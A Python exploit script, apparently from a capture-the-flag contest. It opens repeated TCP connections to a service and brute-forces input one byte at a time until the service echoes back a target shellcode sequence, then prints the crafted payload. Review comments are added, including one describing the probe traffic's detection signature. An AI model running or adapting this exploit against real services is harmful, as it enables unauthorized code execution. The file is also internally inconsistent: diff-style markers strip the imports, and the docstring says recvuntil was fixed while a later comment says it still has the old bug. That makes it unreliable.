- from socket import *
- from struct import *
- import sys
- import time
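def recvuntil(s, length):
    """Read from socket *s* until at least *length* bytes have been collected.

    Args:
        s: a connected socket, or any object exposing ``recv(bufsize)``.
        length: number of bytes to collect before returning.

    Returns:
        The collected bytes. Exactly *length* bytes in the normal case;
        fewer only if the peer closes the connection first (``recv``
        returns an empty string), in which case the partial data is
        returned. A non-positive *length* returns an empty string.

    Note:
        The original looped on ``s.recv(1)`` with no check for an empty
        result, so a closed connection made it spin forever and every
        byte cost one syscall. Asking for the remaining byte count per
        call and stopping on EOF fixes both.
    """
    chunks = []
    got = 0
    while got < length:
        chunk = s.recv(length - got)
        if not chunk:
            # EOF from the peer: return what we have instead of looping forever.
            break
        chunks.append(chunk)
        got += len(chunk)
    return b"".join(chunks)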
- #s.connect(('byhd_147e0accdae13428910e909704b21b11.2014.shallweplayaga.me', 9730))
- shellcode = "48 8b 4d c8 48 83 c1 30 48 81 e2 ff 00 00 00 5b 48 83 eb 15 ff d3"
- shellcode = shellcode.replace(" ","").decode('hex')
# Byte-at-a-time search driven by a comparison oracle.
#
# Indentation below is reconstructed from a flattened paste; the grouping
# of `fail = False` with the outer loop (rather than inside the `if`) is the
# reading under which backtracking works, but it should be confirmed against
# the original file.
#
# State:
#   answer  - the prefix accepted so far (raw bytes)
#   ii      - mirrors len(answer); incremented on accept, decremented on backtrack
#   fail    - True when the previous outer iteration exhausted all candidates
#             and we are resuming from a shortened prefix
#   i       - candidate value for the next byte, tried from 0xff down to 0x00
#
# NOTE(review): from the service side this shows up as a burst of short-lived
# connections to one port, each carrying a payload one byte longer than the
# last, with a fixed ~10 ms gap; that cadence is the detection signature.
answer = ""
ii = len(answer)
fail = False
while ii < 250:  # hard cap on the prefix length being searched
    found = False
    # Only restart from 0xff when the previous round did not fail; after a
    # backtrack `i` was already set to one below the dropped byte.
    # (Style: `if not fail:` reads better than comparing to True.)
    if fail != True:
        i=0xff
    fail = False
    while i>=0:
        # One fresh TCP connection per probe.
        # NOTE(review): nothing closes `s` if connect/send/recv raises, so an
        # exception mid-probe leaks the socket; a try/finally (or a `with`
        # block on a context-manager socket) would cover that.
        s = socket(AF_INET, SOCK_STREAM)
        s.connect(('192.168.0.41', 9730))
        #print hex(i)
        # Protocol as used here: 4-byte little-endian length, then the payload.
        s.send(pack('<L', len(answer)+1))
        s.send(answer+chr(i))
        # Response: 4-byte little-endian length, then that many bytes.
        # NOTE(review): a 4-byte read via recv(4) can itself be short, and
        # recvuntil loops on recv(1) without an EOF check, so a closed or
        # stalled connection hangs this loop rather than failing.
        length = unpack('<L',s.recv(4))[0]
        data = recvuntil(s,length)
        print data
        # The service answers with hex text; compare as raw bytes.
        data = data.decode('hex')
        # Accept the candidate if the response extends the current prefix and
        # the new portion agrees with the reference bytes at the same offsets.
        if len(data) > len(answer) and data[len(answer):] == shellcode[len(answer):len(data)]:
            answer += chr(i)
            print "[+] Found:",answer.encode('hex')
            ii+=1
            s.close()
            found = True
            break
        # Full match: reached only when the incremental test above did not
        # fire, which is the case once `answer` already spans the whole
        # reference string. Prints the result and ends the script.
        if data[:len(shellcode)] == shellcode:
            print answer.encode('hex')
            sys.exit()
        s.close()
        time.sleep(0.01)  # fixed pause between probes
        i-=1
    # No candidate worked for this position: backtrack one byte and resume
    # the previous position from the value just below the one we had accepted.
    # (Style: `if not found:`.)
    if found == False:
        print "[-] Fail"
        if len(answer) <= 1:
            # Nothing left to shorten; give up.
            break
        else:
            last = answer[-1]
            i = ord(last) - 1
            answer = answer[:-1]
            ii-=1
            fail = True